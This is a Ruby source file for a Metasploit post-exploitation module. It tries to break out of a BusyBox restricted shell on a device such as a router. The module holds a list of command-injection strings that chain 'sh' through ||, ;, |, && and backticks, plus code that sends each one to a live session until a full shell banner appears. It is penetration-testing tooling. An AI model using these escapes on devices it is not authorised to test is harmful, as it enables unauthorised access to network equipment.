GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/busybox/jailbreak.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
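class MetasploitModule < Msf::Post

  # Command strings that #run sends to the session, in this order, until one
  # is reported as successful. Every entry combines a command with a shell
  # metacharacter (||, ;, |, &&, backticks) and `sh`, so it only has an effect
  # on a restricted CLI that hands its input line to a system shell without
  # filtering those characters.
  # Frozen so the list cannot be altered at runtime.
  # NOTE(review): the 'cat ($sh)' entry is reproduced byte-for-byte; its
  # syntax differs from the other entries -- confirm it is intentional.
  METHODS = [
    'cat xx || sh',
    'ping || sh',
    'echo `sh >> /dev/ttyp0`',
    'ping `sh >> /dev/ttyp0`',
    'cat `sh >> /dev/ttyp0`',
    'cat xx;sh',
    'echo xx;sh',
    'ping;sh',
    'cat xx | sh',
    'ping | sh',
    'cat ($sh)',
    'cat xx && sh',
    'echo xx && sh',
    'ping && sh'
  ].freeze

  # Registers the module metadata (name, description, author, license,
  # platform and the session type it accepts) with the framework.
  def initialize
    super(
      'Name' => 'BusyBox Jailbreak ',
      'Description' => %q{
        This module will send a set of commands to an open session that is connected to a
        BusyBox limited shell (i.e. a router limited shell). It will try different known
        tricks to jailbreak the limited shell and get a full BusyBox shell.
      },
      'Author' => 'Javier Vicente Vallejo',
      'License' => MSF_LICENSE,
      'Platform' => ['linux'],
      'SessionTypes' => ['shell']
    )
  end

  # Tries each entry of METHODS in order and stops at the first one that
  # #try_method reports as successful. Prints an error when none succeeds.
  #
  # Every attempted command is written to the live session; nothing is
  # undone for the attempts that did not succeed.
  def run
    jailbroken = METHODS.any? { |m| try_method(m) }

    print_error('Unable to jailbreak device shell') unless jailbroken
  end

  # Sends one command line to the session and looks for the BusyBox shell
  # banner in the output that comes back.
  #
  # @param command [String] the line to write to the session (a newline is appended)
  # @return [Boolean] true once a single read contains both "busybox" and
  #   "built...in shell" (case-insensitive); false after ten reads without it
  def try_method(command)
    vprint_status("jailbreak sent: #{command}")
    session.shell_write("#{command}\n")
    10.times do
      resp = session.shell_read.to_s
      next if resp.empty?

      vprint_status("jailbreak received: #{resp}")
      # Each read is checked on its own, so a banner that arrives split
      # across two reads is not recognised. The /i flag already makes the
      # match case-insensitive, so no downcase is needed.
      next unless resp.match?(/busybox/i) && resp.match?(/built.*in shell/i)

      print_good("Jailbreak accomplished with #{command}")
      return true
    end

    false
  end
end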